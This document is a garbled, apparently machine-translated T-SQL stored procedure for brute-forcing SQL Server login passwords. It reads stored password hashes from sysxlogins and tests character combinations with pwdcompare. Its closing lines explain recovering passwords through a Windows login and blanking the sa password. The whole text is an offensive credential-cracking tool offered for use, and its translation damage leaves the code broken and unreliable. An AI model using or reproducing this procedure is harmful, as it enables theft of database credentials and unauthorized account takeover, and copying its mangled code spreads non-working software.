If EXISTS (Select * from dbo.sysObjects where id = Object_id (n '[dbo]. [p_getpassword]') And ObjectProperty (ID, n'isprocedure ') = 1) Drop Procedure [dbo]. [p_getpassword] Go
/ * - Extreme method crack SQL Server user password
You can crack Chinese, special characters, character trailing spaces, in order to facilitate display of special characters, in the display result, ASCII constituting passwords
In theory, you can crack any airade password. The general computer crack 3 passwords do not have any problem. It is enough for your computer. It is enough.
- Zou Jian 2004.08 (Please keep this information) - * /
/ * - Call example - Test special character declare @pwd sysname set @ PWD = char (0) 'a' exec sp_password null, @ PWD, 'SA' EXEC P_GETPASSWORD
- Password with spaces EXEC SP_Password Null, 'A', 'SA' EXEC P_GETPASSWORD - Test Chinese EXEC SPASSWORD NULL, 'I', 'SA' EXEC P_GETPASSWORD
- Clear password EXEC SPASSWORD NULL, NULL, 'SA' - * / CREATE PROC P_GETPASSWORD @ UserName SysName = NULL, - User Name, if not specified, list all users @pwdlen int = 3 - password crack Number, default only 3 bits and below password AS - Generate the password to be cracked Select Name, Password, Type = Case When XStatus & 2048 = 2048 THEN 1 ELSE 0 end, JM = Case When Password is Null or Datanceth (Password) <46 THEN 1 Else 0 end, pwdstr = case when datalength (password) <46 THEN CAST (Password As Sysname) Else Cast ('AS Sysname) end, PWD = CAST (' AS VARCHAR (8000)) INTO #PWDFROM MASTER.DBO.SYSXLOGINS AWHERE SRVID Is Null and Name = Isnull (@ username, name)
- Generate Temporary Table SELECT TOP 255 ID = Id, 0,1) INTO #T from sysobjects a, sysobjects baling Table #t add constraint pk_ # tprimary key (id)
- Clean unwanted characters if not exists (SELECT 1 from #pwd where type = 1) delete from #t where id betWeen 65 and 90 OR ID Between 129 and 254
- Password cracking declare @L INTDECLARE @ s1 varchar (8000), @ s2 varchar (8000), @ s3 varchar (8000), @ s4 varchar (8000)
- Cracked 1 bit password Select @ L = 0, @ S1 = 'id = a.id', @ S2 = '# t a', @ S3 = 'char (b.id)', @ S4 = 'CAST ( B.id as varchar) 'EXEC (' update pwd set jm = 1, pwdstr = ' @ S3 ', PWD = ' @ s4 ' from #pwd pwd, # t bwhere pwd.jm = 0 and pwdcompare (' @ S3 ', PWD.Password, PWD.TYPE) = 1') - Crack more than 2 passwords while exists (SELECT 1 from #pwd where jm = 0 and @L <@PWDLEN-1) Begin Select @ l = @ L 1, @ S1 = @ S1 ', ID' CAST (@L as varchar) '=' char (@ l / 26 97) char (@ l% 26 97) '. id ', @ S2 = @ S2 , # t' char (@ L / 26 97) char (@ l% 26 97), @ S3 = @ S3 ' char (B.ID' CAST (@ l as varchar) ')', @ S4 = @ S4 ' ', '' Cast (B.ID ' CAST (@L as varchar) ' as varchar) 'EXEC (' SELECT ' @ S1 'Into #tt from' @ S2 Update PWD Set JM = 1, PWDSTR = ' @ S3 ', PWD = ' @ S4 ' from #pwd PWD, # TT B Where PWD.JM = 0 and PWDCompare (' @ S3 ', PWD.Password, PWD.TYPE) = 1') End
- Show crack password SELECT username = name, password = pwdstr, password ASCII = PWDFROM #PWDGO is the poor to break the password, the condition is that you have an administrator account
If you don't have an administrator account, you can try to log in as a Windows, perform the above stored procedure to find the password.
If you just want to find SA, you can log in directly with Windows, empty the SA password is line: sp_password null, null, 'sa'
